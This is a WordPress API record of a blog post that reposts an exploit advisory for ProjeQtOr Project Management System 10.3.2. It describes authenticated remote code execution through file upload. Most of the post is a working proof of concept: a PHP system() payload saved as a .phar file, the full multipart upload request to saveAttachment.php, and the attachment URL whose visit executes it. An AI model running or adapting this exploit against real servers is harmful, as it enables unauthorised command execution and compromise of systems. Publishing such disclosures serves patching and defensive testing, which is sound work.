{"id":40575,"date":"2023-04-20T20:19:01","date_gmt":"2023-04-20T16:19:01","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/171950\/ppms1032-shell.txt"},"modified":"2023-04-21T21:50:01","modified_gmt":"2023-04-21T17:20:01","slug":"projeqtor-project-management-system-10-3-2-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/projeqtor-project-management-system-10-3-2-shell-upload\/","title":{"rendered":"ProjeQtOr Project Management System 10.3.2 Shell Upload"},"content":{"rendered":"

Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution (RCE)
\nApplication: ProjeQtOr Project Management System
\nVersion: 10.3.2
\nBugs: Remote Code Execution (RCE) (Authenticated) via file upload
\nTechnology: PHP
\nVendor URL: https:\/\/www.projeqtor.org
\nSoftware Link: https:\/\/sourceforge.net\/projects\/projectorria\/files\/projeqtorV10.3.2.zip\/download
\nDate of found: 19.04.2023
\nAuthor: Mirabbas A\u011falarov
\nTested on: Linux<\/p>\n

2. Technical Details & POC
\n========================================
\nPossible including php file with phar extension while uploading image. Rce is triggered when we visit again<\/p>\n

Payload:<?php echo system(“id”); ?><\/p>\n

poc request:<\/p>\n

POST \/projeqtor\/tool\/saveAttachment.php?csrfToken= HTTP\/1.1
\nHost: localhost
\nContent-Length: 1177
\nsec-ch-ua: “Not?A_Brand”;v=”8″, “Chromium”;v=”108″
\nAccept: application\/json
\nContent-Type: multipart\/form-data; boundary=—-WebKitFormBoundaryY0bpJaQzcvQberWR
\nX-Requested-With: XMLHttpRequest
\nsec-ch-ua-mobile: ?0
\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/108.0.5359.125 Safari\/537.36
\nsec-ch-ua-platform: “Linux”
\nOrigin: http:\/\/localhost
\nSec-Fetch-Site: same-origin
\nSec-Fetch-Mode: cors
\nSec-Fetch-Dest: empty
\nReferer: http:\/\/localhost\/projeqtor\/view\/main.php
\nAccept-Encoding: gzip, deflate
\nAccept-Language: en-US,en;q=0.9
\nCookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic
\nConnection: close<\/p>\n

——WebKitFormBoundaryY0bpJaQzcvQberWR
\nContent-Disposition: form-data; name=”attachmentFiles[]”; filename=”miri.phar”
\nContent-Type: application\/octet-stream<\/p>\n

<?php echo system(“id”); ?><\/p>\n

——WebKitFormBoundaryY0bpJaQzcvQberWR
\nContent-Disposition: form-data; name=”attachmentId”<\/p>\n

——WebKitFormBoundaryY0bpJaQzcvQberWR
\nContent-Disposition: form-data; name=”attachmentRefType”<\/p>\n

User
\n——WebKitFormBoundaryY0bpJaQzcvQberWR
\nContent-Disposition: form-data; name=”attachmentRefId”<\/p>\n

1
\n——WebKitFormBoundaryY0bpJaQzcvQberWR
\nContent-Disposition: form-data; name=”attachmentType”<\/p>\n

file
\n——WebKitFormBoundaryY0bpJaQzcvQberWR
\nContent-Disposition: form-data; name=”MAX_FILE_SIZE”<\/p>\n

10485760
\n——WebKitFormBoundaryY0bpJaQzcvQberWR
\nContent-Disposition: form-data; name=”attachmentLink”<\/p>\n

——WebKitFormBoundaryY0bpJaQzcvQberWR
\nContent-Disposition: form-data; name=”attachmentDescription”<\/p>\n

——WebKitFormBoundaryY0bpJaQzcvQberWR
\nContent-Disposition: form-data; name=”attachmentPrivacy”<\/p>\n

1
\n——WebKitFormBoundaryY0bpJaQzcvQberWR
\nContent-Disposition: form-data; name=”uploadType”<\/p>\n

html5
\n——WebKitFormBoundaryY0bpJaQzcvQberWR–<\/p>\n

visit: http:\/\/localhost\/projeqtor\/files\/attach\/attachment_5\/miri.phar<\/p>\n","protected":false},"excerpt":{"rendered":"

Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution (RCE) Application: ProjeQtOr Project Management System Version: 10.3.2 Bugs: Remote Code Execution (RCE) (Authenticated) via file upload Technology: PHP Vendor URL: https:\/\/www.projeqtor.org Software Link: https:\/\/sourceforge.net\/projects\/projectorria\/files\/projeqtorV10.3.2.zip\/download Date of found: 19.04.2023 Author: Mirabbas A\u011falarov Tested on: Linux 2. Technical Details & POC ======================================== Possible including php file …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-40575","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40575","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=40575"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40575\/revisions"}],"predecessor-version":[{"id":40601,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40575\/revisions\/40601"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=40575"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=40575"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=40575"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}